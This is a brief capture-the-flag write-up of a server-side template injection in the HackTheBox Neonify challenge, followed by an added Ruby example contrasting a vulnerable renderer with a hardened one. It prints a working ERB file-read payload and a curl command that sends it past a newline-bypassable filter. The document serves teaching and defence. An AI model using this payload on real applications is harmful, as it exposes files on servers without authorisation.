We covered the Server-Side Template Injection (SSTI) vulnerability and demonstrated a practical scenario using the HackTheBox Neonify web challenge. SSTI is a server-side exploit in which user input is passed directly to the template engine without validation. In the example we covered, the code contained a regular expression filter to rule out bad characters, so we used a newline character and encoded the payload using URL encoding to reveal the flag contents. This was part of HackTheBox Neonify.


It’s time for a shiny new reveal for the first-ever text neonifier. Come test out our brand new website and make any text glow like a lo-fi neon tube!

Video Highlights

  • We used this SSTI payload to read and reveal sensitive files:
  • <%= File.open('flag.txt').read %>
  • The payload should be URL-encoded and placed after a newline character.

An example request can be sent with curl using the command below to reveal the flag.

curl -d 'neon=a
%3C%25%3D%20File.open%28%27flag.txt%27%29.read%20%25%3E' ip:port
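
Why the newline gets past the filter, and how to close the hole, shown as an added example (not code from the challenge or from the original post). The filter regex, function names and template are assumptions made for illustration, and the probe is harmless arithmetic instead of the file read above.

```ruby
require 'erb'

# Assumed filter in the style the write-up describes. In Ruby, ^ and $
# anchor to each LINE, so a single clean line is enough to pass.
WEAK_FILTER = /^[0-9a-z ]+$/i

# Hardened filter: \A and \z anchor to the start and end of the whole string.
STRICT_FILTER = /\A[0-9a-z ]+\z/i

# Vulnerable pattern: user input becomes part of the template source,
# so any ERB tag that slips past the filter is evaluated on the server.
def render_unsafe(text)
  return 'rejected' unless text.match?(WEAK_FILTER)

  ERB.new("<h1>#{text}</h1>").result(binding)
end

# Hardened pattern: the template is fixed, and the input is passed in
# as data and HTML-escaped, so it is never parsed as template code.
SAFE_TEMPLATE = ERB.new('<h1><%= ERB::Util.html_escape(text) %></h1>')

def render_safe(text)
  return 'rejected' unless text.match?(STRICT_FILTER)

  SAFE_TEMPLATE.result_with_hash(text: text)
end

# Constructed probe: a clean first line, a newline, then an ERB tag.
PROBE = "a\n<%= 7 * 7 %>"

if __FILE__ == $PROGRAM_NAME
  puts render_unsafe(PROBE).inspect       # tag was evaluated by ERB
  puts render_safe(PROBE).inspect         # whole-string anchors reject it
  puts render_safe('hello neon').inspect  # ordinary input still renders
end
```

Either change alone blocks this input, but the fixed template is the real fix: the strict regex only narrows what reaches the renderer.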
